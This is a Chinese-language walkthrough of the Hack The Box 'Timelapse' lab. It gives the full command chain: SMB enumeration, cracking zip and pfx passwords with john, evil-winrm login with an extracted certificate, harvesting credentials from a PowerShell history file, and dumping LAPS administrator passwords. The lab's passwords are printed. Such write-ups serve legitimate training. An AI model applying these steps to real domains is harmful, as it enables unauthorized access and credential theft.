前言
Hack The Box是國外的一個網絡安全在線平臺,允許用戶實踐滲透測試技能,并與其他類似興趣的成員交流想法和方法。它包含一些不斷更新的挑戰,其中一些模擬真實場景,其中一些更傾向于CTF風格的挑戰。
Hack The Box還提供了Rank機制來作為我們挑戰的動力,通過通關靶場來去獲取積分提高自己的排名。
Hack The Box官網:https://www.hackthebox.com
如何開始
在注冊好賬號之后,我們需要去下載兩個連接文件。在自己的home頁面的右上角有一個Connect to HTB。

需要申請這兩個連接文件,具體操作參考:HTB連接
正題:Timelapse靶場
連接
這是我的兩個連接文件,

利用kali自帶的工具進行連接



連接成功。
啟動靶場
選擇好靶機后,點擊Join Machine就能啟動靶機,靶機會提供一個IP。

開始測試
靶機IP:10.10.11.152
連通性測試
ping 10.10.11.152
端口掃描
nmap -sC -sV -oN myscan.txt 10.10.11.152
通過端口掃描發現,主機開放了一下端口,

查看smb共享,
smbclient -L 10.10.11.152
存在如下共享目錄,

在Share的Dev目錄下發現一個壓縮包,

獲取壓縮包文件(獲取可能會失敗,多嘗試幾次),
解壓時發現需要解壓密碼,
利用zip2john進行解密,
提取壓縮包的hash值,
zip2john winrm_backup.zip >> hash
利用字典進行爆破,
john --wordlist=/home/Password-Top1000(1010).txt hash
爆破出密碼為:supremelegacy。
解壓出來的文件還需要密碼才能訪問,
之前爆破出來的密碼不正確不能訪問,
pfx文件是經過秘鑰加密的,我們可以使用命令openssl進行分析,并且要同時使用pkcs12文件工具,生成和分析pkcs12文件,
導出pfx文件的hash,
pfx2john legacyy_dev_auth.pfx >pfx_hash
再次利用john爆破密碼,
john --wordlist=/home/PassWord.txt pfx_hash
密碼為:thuglegacy
發現這是個私鑰文件,

利用openssl進行生成,三個密碼都是我們之前生成的得到的thuglegacy,得到了私鑰文件。
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
得到私鑰文件,還需要生成證書,
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
在開頭信息收集的時候看到了開啟了5986端口,這個端口是用于橫向滲透的端口,可以使用命令evil-winrm進行連接。
利用生成的私鑰文件和證書進行登陸,
evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key -p -u
登陸密碼為我們前面設置的密碼,

成功找到user.txt文件,

這樣就拿到了userown了,但是目標是要拿到systemown,就需要進行提取。
提權
上傳提權文件
upload /home/winPEASx64.exe
下載地址

運行該文件
找到一個歷史文件

下載該文件
download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
查看文件內容
找到一個用戶和密碼
使用該用戶憑證
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
傳遞命令
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname}
dc01
抓取用戶憑證
使用AD-Module,查看 LAPS 密碼
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}
成功獲取到administrator的密碼。
嘗試登陸
evil-winrm -i 10.10.11.152 -S -u 'administrator' -p 'z+&4Olgpgn;,11t5XbE#x0,2'
成功登陸。
最終在rtx用戶的桌面找到root.txt獲得系統擁有權。
后記
作為一個剛入行的小白,第一次發表文章,求大佬們多多指點!
安全牛
安全牛
安全牛
系統安全運維
安全圈
D1Net
系統安全運維
商密君
安全牛
FreeBuf
一顆小胡椒
關鍵基礎設施安全應急響應中心